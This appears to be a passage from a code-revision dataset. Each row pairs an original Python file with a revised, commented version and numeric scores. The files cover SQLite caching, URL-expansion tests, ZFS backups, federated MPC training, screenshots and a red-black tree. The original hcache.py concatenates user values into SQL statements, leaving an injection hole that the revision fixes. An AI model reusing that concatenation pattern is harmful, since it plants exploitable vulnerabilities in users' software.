if __name__ == "__main__":
main() | 0.358129 | 0.207155 |
import sqlite3
from sqlite3 import Error
def create_connection(db_file):
    """ create a database connection to the SQLite database
        specified by db_file
    :param db_file: database file
    :return: Connection object or None
    """
    try:
        return sqlite3.connect(db_file)
    except Error as exc:
        # Mirror the project's convention of printing DB errors and
        # signalling failure with None.
        print(exc)
    return None
# -------------------------------------------------------------------
def have_position(x):
    """Return True when ticker `x` has at least one row in `position`.

    The ticker is bound as a query parameter rather than concatenated into
    the SQL text, closing the injection hole in the original; the
    connection is now closed instead of leaked.
    """
    database = r"hcache.db"
    rows = []
    conn = create_connection(database)
    if conn is not None:
        try:
            cursor = conn.cursor()
            cursor.execute("SELECT * FROM position WHERE ticker = ?;", (x,))
            rows = cursor.fetchall()
            cursor.close()
        finally:
            conn.close()
    else:
        print("Error! cannot create the database connection.")
    return bool(rows)
# -------------------------------------------------------------------
def return_position(x):
    """Return every row of the `position` table.

    NOTE(review): the `x` argument is unused; it is kept only so existing
    callers continue to work. The no-op `WHERE 1=1` was dropped and the
    connection is now closed instead of leaked.
    """
    rows = []
    conn = create_connection(r"hcache.db")
    if conn is None:
        print("Error! cannot create the database connection.")
        return rows
    try:
        cursor = conn.cursor()
        cursor.execute("SELECT * FROM position;")
        rows = cursor.fetchall()
        cursor.close()
    finally:
        conn.close()
    return rows
# ------------------------------
def create_table(conn, create_table_sql):
    """Execute a CREATE TABLE statement on `conn`, printing any sqlite
    error instead of raising (matching the module's error convention)."""
    try:
        conn.cursor().execute(create_table_sql)
    except Error as exc:
        print(exc)
# ------------------------------
def create_1m():
    # Ensure the one-minute OHLCV candle table exists in hcache.db.
    # All columns are text; conversion is presumably done by callers —
    # TODO confirm.
    database = r"hcache.db"
    sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS history_1m (
                                        symbol text,
                                        open text,
                                        close text,
                                        high text,
                                        low text,
                                        volume text
                                    ); """
    # create a database connection
    conn = create_connection(database)
    # create tables
    if conn is not None:
        # create projects table
        create_table(conn, sql_create_trades_table)
    else:
        print("Error! cannot create the database connection.")
# ------------------------------
def create_listings():
    # Ensure the security listings table exists in hcache.db.
    # `etf` is stored as text (presumably a "Y"/"N" style flag — TODO
    # confirm against the data source).
    database = r"hcache.db"
    sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS listings (
                                        symbol text,
                                        securityname text,
                                        etf text
                                    ); """
    # create a database connection
    conn = create_connection(database)
    # create tables
    if conn is not None:
        # create projects table
        create_table(conn, sql_create_trades_table)
    else:
        print("Error! cannot create the database connection.")
# ------------------------------
def insert_into_listings(symbol, securityname, etf):
    """Insert one row into the `listings` table.

    Values are bound as parameters instead of being interpolated into the
    SQL text — fixing both the injection hole and breakage on values
    containing quotes. The connection is now guarded against a failed
    create_connection() and closed when done.
    """
    conn = create_connection(r"hcache.db")
    if conn is None:
        print("Error! cannot create the database connection.")
        return
    try:
        cursor = conn.cursor()
        cursor.execute(
            "INSERT INTO listings (symbol, securityname, etf) VALUES (?, ?, ?);",
            (symbol, securityname, etf))
        conn.commit()
        cursor.close()
    finally:
        conn.close()
# ------------------------------
def download(tickers="", interval="", start=""):
    """Stub downloader: logs the request and does nothing else.

    `interval` and `start` are accepted for API compatibility but ignored.
    """
    print("Searching:", tickers)
return | hcache.py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return conn
# -------------------------------------------------------------------
def have_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE ticker = '"+x+"';")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
#print ("OUT:",rows)
cursor.close()
else:
print("Error! cannot create the database connection.")
if rows == []:
found = False
else:
found = True
return found
# -------------------------------------------------------------------
def return_position(x):
database = r"hcache.db"
rows = []
conn = create_connection(database)
if conn is not None:
query = ("SELECT * FROM position WHERE 1=1;")
cursor = conn.cursor()
count = cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
else:
print("Error! cannot create the database connection.")
return rows
# ------------------------------
def create_table(conn, create_table_sql):
try:
c = conn.cursor()
c.execute(create_table_sql)
except Error as e:
print(e)
# ------------------------------
def create_1m():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS history_1m (
symbol text,
open text,
close text,
high text,
low text,
volume text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def create_listings():
database = r"hcache.db"
sql_create_trades_table = """ CREATE TABLE IF NOT EXISTS listings (
symbol text,
securityname text,
etf text
); """
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_trades_table)
else:
print("Error! cannot create the database connection.")
# ------------------------------
def insert_into_listings(symbol,securityname,etf):
database = r"hcache.db"
conn = create_connection(database)
sqlite_statement = ("INSERT INTO listings (symbol, securityname, etf)\n" +
"VALUES(\""+symbol+"\"," +
"\""+securityname+"\","+
"\""+etf+"\""+");")
cursor = conn.cursor()
count = cursor.execute(sqlite_statement)
conn.commit()
cursor.close()
# ------------------------------
def download(tickers="", interval="", start=""):
print("Searching:", tickers)
return | 0.110405 | 0.07403 |
import unittest
from NwalaTextUtils.textutils import cleanHtml
from NwalaTextUtils.textutils import derefURI
from NwalaTextUtils.textutils import expandURL
from NwalaTextUtils.textutils import expandURLs
from NwalaTextUtils.textutils import getPgTitleFrmHTML
from NwalaTextUtils.textutils import parallelGetTxtFrmURIs
class TestTextutils(unittest.TestCase):
    """Integration tests for NwalaTextUtils.textutils.

    NOTE(review): these tests dereference live URLs, so they need network
    access and will break if the target pages change or disappear.
    """

    def test_deref_boilrm_title(self):
        # Dereference one article, strip boilerplate, sanity-check sizes.
        uri = 'https://time.com/3505982/ebola-new-cases-world-health-organization/'
        html = derefURI(uri, 0)
        plaintext = cleanHtml(html)
        title = getPgTitleFrmHTML(html)
        self.assertGreater( len(html), 1000, "html.len < 1000" )
        self.assertGreater( len(plaintext), 1000, "plaintext.len < 1000" )
        self.assertGreater( len(title), 10, "title.len < 10" )
        '''
        print( 'title:', title.strip() )
        print( 'html prefix (' + str(len(html)) + ' chars):', html[:11].strip() )
        print( 'plaintext prefix (' + str(len(plaintext)) + ' chars)', plaintext[:21].strip() )
        '''

    def test_deref_boilrm_title_prl(self):
        # Parallel dereference; each doc dict must carry non-trivial
        # text, uri, and title fields.
        uris_lst = [
            'http://www.euro.who.int/en/health-topics/emergencies/pages/news/news/2015/03/united-kingdom-is-declared-free-of-ebola-virus-disease',
            'https://time.com/3505982/ebola-new-cases-world-health-organization/',
            'https://www.scientificamerican.com/article/why-ebola-survivors-struggle-with-new-symptoms/'
        ]
        doc_lst = parallelGetTxtFrmURIs(uris_lst)
        self.assertEqual( len(doc_lst), 3, "doc_lst.len != 3" )
        for d in doc_lst:
            self.assertGreater( len(d['text']), 1000, "text.len < 1000" )
            # Failure message fixed: the threshold here is 10, not 1000.
            self.assertGreater( len(d['uri']), 10, "uri.len < 10" )
            self.assertGreater( len(d['title']), 10, "title.len < 10" )

    def test_expand_url_single(self):
        short_u = 'https://t.co/OfAQRC1Opd?amp=1'
        long_u = expandURL(short_u)
        key = 'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3'
        self.assertEqual( long_u, key, "long_u != key" )

    def test_expand_url_multiple(self):
        # expandURLs accepts both a list of strings (returns strings) and a
        # list of {'url': ...} dicts (returns dicts with 'long_url' added).
        uris_lst = [
            'https://t.co/OfAQRC1Opd?amp=1',
            'https://t.co/uqJhpqpUcl?amp=1'
        ]
        url_keys = [
            'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3',
            'https://www.theguardian.com/us-news/2015/dec/15/michigan-mayor-declares-manmade-disaster-lead-tainted-water-supply'
        ]
        res = expandURLs(uris_lst)
        for i in range( len(res) ):
            long_u = res[i]
            self.assertEqual( long_u, url_keys[i], "long_u != key" )
        uris_lst = [
            {'url': 'https://t.co/OfAQRC1Opd?amp=1'},
            {'url': 'https://t.co/uqJhpqpUcl?amp=1'}
        ]
        res = expandURLs(uris_lst)
        for i in range( len(res) ):
            long_u = res[i]['long_url']
            self.assertEqual( long_u, url_keys[i], "long_u != key" )
if __name__ == '__main__':
unittest.main() | tests/test_generic.py | import unittest
from NwalaTextUtils.textutils import cleanHtml
from NwalaTextUtils.textutils import derefURI
from NwalaTextUtils.textutils import expandURL
from NwalaTextUtils.textutils import expandURLs
from NwalaTextUtils.textutils import getPgTitleFrmHTML
from NwalaTextUtils.textutils import parallelGetTxtFrmURIs
class TestTextutils(unittest.TestCase):
def test_deref_boilrm_title(self):
uri = 'https://time.com/3505982/ebola-new-cases-world-health-organization/'
html = derefURI(uri, 0)
plaintext = cleanHtml(html)
title = getPgTitleFrmHTML(html)
self.assertGreater( len(html), 1000, "html.len < 1000" )
self.assertGreater( len(plaintext), 1000, "plaintext.len < 1000" )
self.assertGreater( len(title), 10, "title.len < 10" )
'''
print( 'title:', title.strip() )
print( 'html prefix (' + str(len(html)) + ' chars):', html[:11].strip() )
print( 'plaintext prefix (' + str(len(plaintext)) + ' chars)', plaintext[:21].strip() )
'''
def test_deref_boilrm_title_prl(self):
uris_lst = [
'http://www.euro.who.int/en/health-topics/emergencies/pages/news/news/2015/03/united-kingdom-is-declared-free-of-ebola-virus-disease',
'https://time.com/3505982/ebola-new-cases-world-health-organization/',
'https://www.scientificamerican.com/article/why-ebola-survivors-struggle-with-new-symptoms/'
]
doc_lst = parallelGetTxtFrmURIs(uris_lst)
self.assertEqual( len(doc_lst), 3, "doc_lst.len != 3" )
for d in doc_lst:
self.assertGreater( len(d['text']), 1000, "text.len < 1000" )
self.assertGreater( len(d['uri']), 10, "uri.len < 1000" )
self.assertGreater( len(d['title']), 10, "title.len < 10" )
def test_expand_url_single(self):
short_u = 'https://t.co/OfAQRC1Opd?amp=1'
long_u = expandURL(short_u)
key = 'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3'
self.assertEqual( long_u, key, "long_u != key" )
def test_expand_url_multiple(self):
uris_lst = [
'https://t.co/OfAQRC1Opd?amp=1',
'https://t.co/uqJhpqpUcl?amp=1'
]
url_keys = [
'https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3',
'https://www.theguardian.com/us-news/2015/dec/15/michigan-mayor-declares-manmade-disaster-lead-tainted-water-supply'
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]
self.assertEqual( long_u, url_keys[i], "long_u != key" )
uris_lst = [
{'url': 'https://t.co/OfAQRC1Opd?amp=1'},
{'url': 'https://t.co/uqJhpqpUcl?amp=1'}
]
res = expandURLs(uris_lst)
for i in range( len(res) ):
long_u = res[i]['long_url']
self.assertEqual( long_u, url_keys[i], "long_u != key" )
if __name__ == '__main__':
unittest.main() | 0.346541 | 0.373819 |
import logging
import logging.handlers
import os
import pwd
import subprocess
import time
from functools import wraps
import httplib2
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from .settings import *
TIMING = {}
def get_logger(system):
    """Return a syslog-backed logger named after `system`.

    Idempotent: repeated calls for the same name no longer stack duplicate
    SysLogHandlers (the original added one per call, multiplying every
    emitted record).
    """
    logger = logging.getLogger(system)
    logger.setLevel("INFO")
    if not logger.handlers:
        # NOTE(review): /dev/log is Linux-specific; adjust on other platforms.
        handler = logging.handlers.SysLogHandler(address='/dev/log')
        formatter = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    return logger
def timeit(func):
    """Decorator recording each successful call's wall-clock duration.

    Durations are appended to ``TIMING[func.__name__]``; calls that raise
    are not recorded (matching the original behaviour).
    """
    @wraps(func)
    def timer(*args, **kwargs):
        started = time.time()
        result = func(*args, **kwargs)
        elapsed = time.time() - started
        TIMING.setdefault(func.__name__, []).append(elapsed)
        return result
    return timer
class BackupBase:
    """Base class for per-user Google-service backups stored on ZFS.

    Subclasses implement run() and may define initialize_service(); state
    lives under /<ZPOOL_ROOT_PATH>/<system>/<user email with @ -> __>.
    """

    def __init__(self, system, user_email):
        self.system = system
        self.user_email = user_email
        # ZFS dataset name (no leading slash) and its mountpoint path.
        self.zfsrootpath = "%s/%s/%s" % (ZPOOL_ROOT_PATH, system, user_email.replace("@", "__"))
        self.rootpath = "/%s" % self.zfsrootpath
        self.queue = None
        self.logger = logging.getLogger("%s.%s" % (system, user_email))
        self.timing = {}

    def print_timing(self):
        # NOTE(review): prints the module-wide TIMING dict, not self.timing.
        print(TIMING)

    @timeit
    def _impersonate_user(self, scope):
        """Return (http, credentials) authorized to act as self.user_email
        for `scope`, using the service account's PKCS#12 key."""
        assert scope
        self.logger.debug("Impersonating user %s", self.user_email)
        with open(SERVICE_ACCOUNT_PKCS12_FILE_PATH, 'rb') as f:
            key = f.read()
        credentials = SignedJwtAssertionCredentials(SERVICE_ACCOUNT_EMAIL, key, scope=scope, sub=self.user_email)
        http = httplib2.Http(".cache")
        http = credentials.authorize(http)
        credentials.refresh(http)
        return (http, credentials)

    @timeit
    def impersonate_user(self, scope, service_name, service_version=None):
        """Build an authorized Google API service client for this user."""
        (http, _) = self._impersonate_user(scope)
        service = build(serviceName=service_name, version=service_version, http=http)
        return service

    @timeit
    def initialize(self):
        """Create and chown the user's ZFS dataset; return False on failure.

        Also invokes initialize_service() when the subclass defines one.
        """
        assert self.system
        if not os.path.exists(self.rootpath):
            self.logger.info("Creating %s for %s", self.rootpath, self.user_email)
            # zfs create requires root; sudo must be configured accordingly.
            zfs_p = subprocess.Popen(["/usr/bin/sudo", "/sbin/zfs", "create", self.zfsrootpath])
            retcode = zfs_p.wait()
            if retcode != 0:
                self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
                return False
            # Verify the dataset actually mounted where we expect it.
            if not os.path.exists(self.rootpath):
                self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
                return False
        if pwd.getpwuid(os.stat(self.rootpath).st_uid).pw_name != BACKUP_OWNER:
            chown_p = subprocess.Popen(["/usr/bin/sudo", "/bin/chown", BACKUP_OWNER, self.rootpath])
            retcode = chown_p.wait()
            if retcode != 0:
                self.logger.error("Unable to change ownership of %s to %s", self.rootpath, BACKUP_OWNER)
                return False
        try:
            self.initialize_service()
        except AttributeError:
            # Subclass defines no initialize_service(); that's fine.
            # NOTE(review): this also swallows AttributeErrors raised *inside*
            # initialize_service() — consider hasattr() instead.
            pass
        return True
def run(self, *args, **kwargs):
raise NotImplementedError("run() is not implemented") | helpers.py | import logging
import logging.handlers
import os
import pwd
import subprocess
import time
from functools import wraps
import httplib2
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from .settings import *
TIMING = {}
def get_logger(system):
    """Build a logger named *system* that sends INFO+ records to syslog."""
    syslog_handler = logging.handlers.SysLogHandler(address='/dev/log')
    syslog_handler.setFormatter(
        logging.Formatter('%(name)s - %(levelname)s - %(message)s'))
    logger = logging.getLogger(system)
    logger.setLevel("INFO")
    logger.addHandler(syslog_handler)
    return logger
def timeit(func):
    """Wrap *func* so each call's duration is appended to TIMING."""
    @wraps(func)
    def timer(*args, **kwargs):
        started = time.time()
        outcome = func(*args, **kwargs)
        finished = time.time()
        TIMING.setdefault(func.__name__, []).append(finished - started)
        return outcome
    return timer
class BackupBase:
def __init__(self, system, user_email):
self.system = system
self.user_email = user_email
self.zfsrootpath = "%s/%s/%s" % (ZPOOL_ROOT_PATH, system, user_email.replace("@", "__"))
self.rootpath = "/%s" % self.zfsrootpath
self.queue = None
self.logger = logging.getLogger("%s.%s" % (system, user_email))
self.timing = {}
def print_timing(self):
print(TIMING)
@timeit
def _impersonate_user(self, scope):
assert scope
self.logger.debug("Impersonating user %s", self.user_email)
with open(SERVICE_ACCOUNT_PKCS12_FILE_PATH, 'rb') as f:
key = f.read()
credentials = SignedJwtAssertionCredentials(SERVICE_ACCOUNT_EMAIL, key, scope=scope, sub=self.user_email)
http = httplib2.Http(".cache")
http = credentials.authorize(http)
credentials.refresh(http)
return (http, credentials)
@timeit
def impersonate_user(self, scope, service_name, service_version=None):
(http, _) = self._impersonate_user(scope)
service = build(serviceName=service_name, version=service_version, http=http)
return service
@timeit
def initialize(self):
assert self.system
if not os.path.exists(self.rootpath):
self.logger.info("Creating %s for %s", self.rootpath, self.user_email)
zfs_p = subprocess.Popen(["/usr/bin/sudo", "/sbin/zfs", "create", self.zfsrootpath])
retcode = zfs_p.wait()
if retcode != 0:
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if not os.path.exists(self.rootpath):
self.logger.error("Unable to create %s for %s", self.rootpath, self.user_email)
return False
if pwd.getpwuid(os.stat(self.rootpath).st_uid).pw_name != BACKUP_OWNER:
chown_p = subprocess.Popen(["/usr/bin/sudo", "/bin/chown", BACKUP_OWNER, self.rootpath])
retcode = chown_p.wait()
if retcode != 0:
self.logger.error("Unable to change ownership of %s to %s", self.rootpath, BACKUP_OWNER)
return False
try:
self.initialize_service()
except AttributeError:
pass
return True
def run(self, *args, **kwargs):
raise NotImplementedError("run() is not implemented") | 0.322739 | 0.060836 |
import os
import sys
import time
import numpy as np
import paddle.fluid as fluid
import paddle_fl.mpc as pfl_mpc
from paddle_fl.mpc.data_utils.data_utils import get_datautils
sys.path.append('..')
import network
import process_data
mpc_protocol_name = 'aby3'
mpc_du = get_datautils(mpc_protocol_name)
def load_uci_update(role, ip, server, port, mpc_model_dir, mpc_model_filename, updated_model_dir):
    """Load, fine-tune and re-save the encrypted (MPC) UCI housing model.

    role/ip/server/port identify this party in the ABY3 protocol; model
    shares are read from *mpc_model_dir* and the updated trainable model
    is written to *updated_model_dir*.
    """
    place = fluid.CPUPlace()
    exe = fluid.Executor(place)
    # Step 1. initialize MPC environment and load MPC model into
    # default_main_program to update.
    pfl_mpc.init(mpc_protocol_name, role, ip, server, port)
    mpc_du.load_mpc_model(exe=exe,
                          mpc_model_dir=mpc_model_dir,
                          mpc_model_filename=mpc_model_filename)
    # Step 2. MPC update (training loop over the encrypted data shares).
    epoch_num = network.MPC_UPDATE_EPOCH
    batch_size = network.BATCH_SIZE
    mpc_data_dir = "../mpc_data/"
    feature_file = mpc_data_dir + "house_feature"
    feature_shape = (13,)
    label_file = mpc_data_dir + "house_label"
    label_shape = (1,)
    # One encrypted-loss dump per party; start from a clean file each run.
    loss_file = "./tmp/uci_mpc_loss.part{}".format(role)
    if os.path.exists(loss_file):
        os.remove(loss_file)
    updated_model_name = 'mpc_updated_model'
    feature_name = 'x'
    label_name = 'y'
    # fetch loss if needed (variable name fixed by the network definition)
    loss = fluid.default_main_program().global_block().var('mean_0.tmp_0')
    loader = process_data.get_mpc_dataloader(feature_file, label_file, feature_shape, label_shape,
                                             feature_name, label_name, role, batch_size)
    start_time = time.time()
    for epoch_id in range(epoch_num):
        step = 0
        for sample in loader():
            mpc_loss = exe.run(feed=sample, fetch_list=[loss.name])
            if step % 50 == 0:
                print('Epoch={}, Step={}, Loss={}'.format(epoch_id, step, mpc_loss))
            # Fix: ndarray.tostring() has been deprecated since NumPy 1.19
            # and was removed in NumPy 2.0; tobytes() is byte-identical.
            with open(loss_file, 'ab') as f:
                f.write(np.array(mpc_loss).tobytes())
            step += 1
    end_time = time.time()
    print('Mpc Updating of Epoch={} Batch_size={}, cost time in seconds:{}'
          .format(epoch_num, batch_size, (end_time - start_time)))
    # Step 3. save updated MPC model as a trainable model.
    mpc_du.save_trainable_model(exe=exe,
                                model_dir=updated_model_dir,
                                model_filename=updated_model_name)
    print('Successfully save mpc updated model into:{}'.format(updated_model_dir))
if __name__ == '__main__':
    # Usage: python <script> <role> <server_ip> <port>
    # (Fix: dataset-extraction junk fused onto the final line removed.)
    role, server, port = int(sys.argv[1]), sys.argv[2], int(sys.argv[3])
    mpc_model_dir = './tmp/mpc_models_to_update/model_share_{}'.format(role)
    mpc_model_filename = 'model_to_update'
    updated_model_dir = './tmp/mpc_models_updated/updated_model_share_{}'.format(role)
    load_uci_update(role=role,
                    ip='localhost',
                    server=server,
                    port=port,
                    mpc_model_dir=mpc_model_dir,
                    mpc_model_filename=mpc_model_filename,
                    updated_model_dir=updated_model_dir)
import sys
import time
import numpy as np
import paddle.fluid as fluid
import paddle_fl.mpc as pfl_mpc
from paddle_fl.mpc.data_utils.data_utils import get_datautils
sys.path.append('..')
import network
import process_data
mpc_protocol_name = 'aby3'
mpc_du = get_datautils(mpc_protocol_name)
def load_uci_update(role, ip, server, port, mpc_model_dir, mpc_model_filename, updated_model_dir):
"""
Load, update and save uci MPC model.
"""
place = fluid.CPUPlace()
exe = fluid.Executor(place)
# Step 1. initialize MPC environment and load MPC model into default_main_program to update.
pfl_mpc.init(mpc_protocol_name, role, ip, server, port)
mpc_du.load_mpc_model(exe=exe,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename)
# Step 2. MPC update
epoch_num = network.MPC_UPDATE_EPOCH
batch_size = network.BATCH_SIZE
mpc_data_dir = "../mpc_data/"
feature_file = mpc_data_dir + "house_feature"
feature_shape = (13,)
label_file = mpc_data_dir + "house_label"
label_shape = (1,)
loss_file = "./tmp/uci_mpc_loss.part{}".format(role)
if os.path.exists(loss_file):
os.remove(loss_file)
updated_model_name = 'mpc_updated_model'
feature_name = 'x'
label_name = 'y'
# fetch loss if needed
loss = fluid.default_main_program().global_block().var('mean_0.tmp_0')
loader = process_data.get_mpc_dataloader(feature_file, label_file, feature_shape, label_shape,
feature_name, label_name, role, batch_size)
start_time = time.time()
for epoch_id in range(epoch_num):
step = 0
for sample in loader():
mpc_loss = exe.run(feed=sample, fetch_list=[loss.name])
if step % 50 == 0:
print('Epoch={}, Step={}, Loss={}'.format(epoch_id, step, mpc_loss))
with open(loss_file, 'ab') as f:
f.write(np.array(mpc_loss).tostring())
step += 1
end_time = time.time()
print('Mpc Updating of Epoch={} Batch_size={}, cost time in seconds:{}'
.format(epoch_num, batch_size, (end_time - start_time)))
# Step 3. save updated MPC model as a trainable model.
mpc_du.save_trainable_model(exe=exe,
model_dir=updated_model_dir,
model_filename=updated_model_name)
print('Successfully save mpc updated model into:{}'.format(updated_model_dir))
if __name__ == '__main__':
role, server, port = int(sys.argv[1]), sys.argv[2], int(sys.argv[3])
mpc_model_dir = './tmp/mpc_models_to_update/model_share_{}'.format(role)
mpc_model_filename = 'model_to_update'
updated_model_dir = './tmp/mpc_models_updated/updated_model_share_{}'.format(role)
load_uci_update(role=role,
ip='localhost',
server=server,
port=port,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename,
updated_model_dir=updated_model_dir) | 0.341692 | 0.08819 |
import os
import time
import traceback
from base64 import b64decode
import flybirds.core.global_resource as gr
import flybirds.utils.file_helper as file_helper
import flybirds.utils.flybirds_log as log
import flybirds.utils.uuid_helper as uuid_helper
from flybirds.core.global_context import GlobalContext as g_context
from flybirds.core.plugin.plugins.default.ios_snapshot import get_screen
class BaseScreen:
    """Default screenshot plugin: capture frames and link them into reports."""

    @staticmethod
    def screen_shot(path):
        """
        Take a screenshot and save it to *path*.
        """
        log.info(f"[screen_shot] screen shot start. path is:{path}")
        cur_platform = g_context.platform
        try:
            if cur_platform is None:
                log.error('[screen_shot] get cur_platform is None!')
                raise Exception("[screen_shot] get cur_platform is None!")
            poco = g_context.ui_driver_instance
            screen_size = gr.get_device_size()
            if cur_platform.strip().lower() == "ios":
                b64img, fmt = get_screen()
            else:
                b64img, fmt = poco.snapshot(width=screen_size[1])
            # Fix: use a context manager so the file handle is closed even
            # when the write fails (was a bare open(...).write(...)).
            with open(path, "wb") as image_file:
                image_file.write(b64decode(b64img))
        except Exception as e:
            log.warn(
                "Screenshot failed path: {}, error: {}".format(path, str(e)),
                traceback.format_exc(),
            )
        log.info("[screen_shot] screen shot end!")

    @staticmethod
    def screen_link_to_behave(scenario, step_index, tag=None):
        """
        screenshot address and linked to the <scr> tag
        The label information is placed in the description of the scene,
        and the json report is processed after all the runs are finished,
        and the <scr> information in the description is converted into
        embeddings information in the step.
        """
        feature_name = file_helper.valid_file_name(scenario.feature.name)
        scenario_name = file_helper.valid_file_name(scenario.name)
        if len(scenario.steps) > step_index >= 0:
            # Fix: when *tag* was None the old code set file_name = None and
            # then ran "file_name += ...", raising TypeError.  An absent tag
            # now simply contributes an empty prefix.
            file_name = (tag if tag is not None else "") + (
                scenario_name
                + uuid_helper.create_short_uuid()
                + str(int(round(time.time() * 1000)))
                + ".png"
            )
            screen_shot_dir = gr.get_screen_save_dir()
            if screen_shot_dir is not None:
                current_screen_dir = os.path.join(screen_shot_dir,
                                                  feature_name)
            else:
                current_screen_dir = os.path.join(feature_name)
            log.info(f"[screen_link_to_behave] screen_shot_dir path :"
                     f"{screen_shot_dir} and "
                     f"current_screen_dir path: {current_screen_dir}")
            file_helper.create_dirs_path_object(current_screen_dir)
            src_path = "../screenshot/{}/{}".format(feature_name, file_name)
            log.info("[screen_link_to_behave] src_path: {}".format(src_path))
            data = (
                'embeddingsTags, stepIndex={}, <image class ="screenshot"'
                ' width="375" src="{}" />'.format(step_index, src_path)
            )
            scenario.description.append(data)
            g_context.screen.screen_shot(
                os.path.join(current_screen_dir, file_name))
import time
import traceback
from base64 import b64decode
import flybirds.core.global_resource as gr
import flybirds.utils.file_helper as file_helper
import flybirds.utils.flybirds_log as log
import flybirds.utils.uuid_helper as uuid_helper
from flybirds.core.global_context import GlobalContext as g_context
from flybirds.core.plugin.plugins.default.ios_snapshot import get_screen
class BaseScreen:
@staticmethod
def screen_shot(path):
"""
Take a screenshot and save
"""
log.info(f"[screen_shot] screen shot start. path is:{path}")
cur_platform = g_context.platform
try:
if cur_platform is None:
log.error('[screen_shot] get cur_platform is None!')
raise Exception("[screen_shot] get cur_platform is None!")
poco = g_context.ui_driver_instance
screen_size = gr.get_device_size()
if cur_platform.strip().lower() == "ios":
b64img, fmt = get_screen()
else:
b64img, fmt = poco.snapshot(width=screen_size[1])
open(path, "wb").write(b64decode(b64img))
except Exception as e:
log.warn(
"Screenshot failed path: {}, error: {}".format(path, str(e)),
traceback.format_exc(),
)
log.info("[screen_shot] screen shot end!")
@staticmethod
def screen_link_to_behave(scenario, step_index, tag=None):
"""
screenshot address and linked to the <scr> tag
The label information is placed in the description of the scene,
and the json report is processed after all the runs are finished,
and the <scr> information in the description is converted into
embeddings information in the step.
"""
feature_name = file_helper.valid_file_name(scenario.feature.name)
scenario_name = file_helper.valid_file_name(scenario.name)
if len(scenario.steps) > step_index >= 0:
file_name = None
if not (tag is None):
file_name = tag
file_name += (
scenario_name
+ uuid_helper.create_short_uuid()
+ str(int(round(time.time() * 1000)))
+ ".png"
)
screen_shot_dir = gr.get_screen_save_dir()
if not (screen_shot_dir is None):
current_screen_dir = os.path.join(screen_shot_dir,
feature_name)
else:
current_screen_dir = os.path.join(feature_name)
log.info(f"[screen_link_to_behave] screen_shot_dir path :"
f"{screen_shot_dir} and "
f"current_screen_dir path: {current_screen_dir}")
file_helper.create_dirs_path_object(current_screen_dir)
src_path = "../screenshot/{}/{}".format(feature_name, file_name)
log.info("[screen_link_to_behave] src_path: {}".format(src_path))
data = (
'embeddingsTags, stepIndex={}, <image class ="screenshot"'
' width="375" src="{}" />'.format(step_index, src_path)
)
scenario.description.append(data)
g_context.screen.screen_shot(
os.path.join(current_screen_dir, file_name)) | 0.295535 | 0.065306 |
import Color
import node
class RBTree(object):
    """Red-black binary search tree.

    Uses one shared NIL sentinel node (``self.nil``) in place of ``None``
    leaves; the sentinel is created from the node factory with data=None.
    Colors are used as truthy for red and falsy for black throughout
    (assumes Color.Color defines RED/BLACK that way — TODO confirm).
    """
    RBNode = node.RBNode
    def __init__(self, new_node=RBNode):
        """Create an empty tree; *new_node* is the node factory callable."""
        self._nil = new_node(data=None)  # NIL sentinel; leaves are always black
        self._root = self.nil  # empty tree: root starts as the sentinel
        self._new_node = new_node  # callable used to create nodes
    """getters"""
    @property
    def root(self):
        return self._root
    @property
    def nil(self):
        return self._nil
    def _grandfather(self, node):  # return the node's grandparent
        if node != self.nil and node.parent != self.nil:
            return node.parent.parent
        else:
            return self.nil  # sentinel stands in for a missing grandparent
    def _uncle(self, node):  # return the node's uncle (parent's sibling)
        g = self._grandfather(node)
        if g == self.nil:
            return self.nil
        else:
            if node.parent == g.leftChild:
                return g.rightChild
            else:
                return g.leftChild
    def _brother(self, node):  # return the node's sibling (left or right)
        assert node.parent != self.nil
        if node == node.parent.leftChild:
            return node.parent.rightChild
        else:
            return node.parent.leftChild
    def min_data(self, node=None):
        """Return the minimum key in *node*'s subtree (whole tree by default).

        NOTE(review): returns ``node.data`` while max_data returns the node
        object — asymmetric; confirm which contract callers expect.
        """
        if node is None:
            node = self.root
        while node.leftChild != self.nil:
            node = node.leftChild
        return node.data
    def max_data(self, node=None):
        """Return the *node* holding the maximum key in the subtree."""
        if node is None:
            node = self.root
        while node.rightChild != self.nil:
            node = node.rightChild
        return node
    def delete_data(self, data):
        """Delete the node whose key equals *data*; True if one existed."""
        node = self.find(data)
        if node == self.nil:
            return False
        self.delete_node(node)
        return True
    def delete_node(self, node):
        """Unlink *node* from the tree (BST delete, then red-black fixup)."""
        c = Color.Color()
        if not node or node == self.nil:
            return
        # y_node is the node physically removed: *node* itself when it has
        # at most one real child, otherwise its in-order successor.
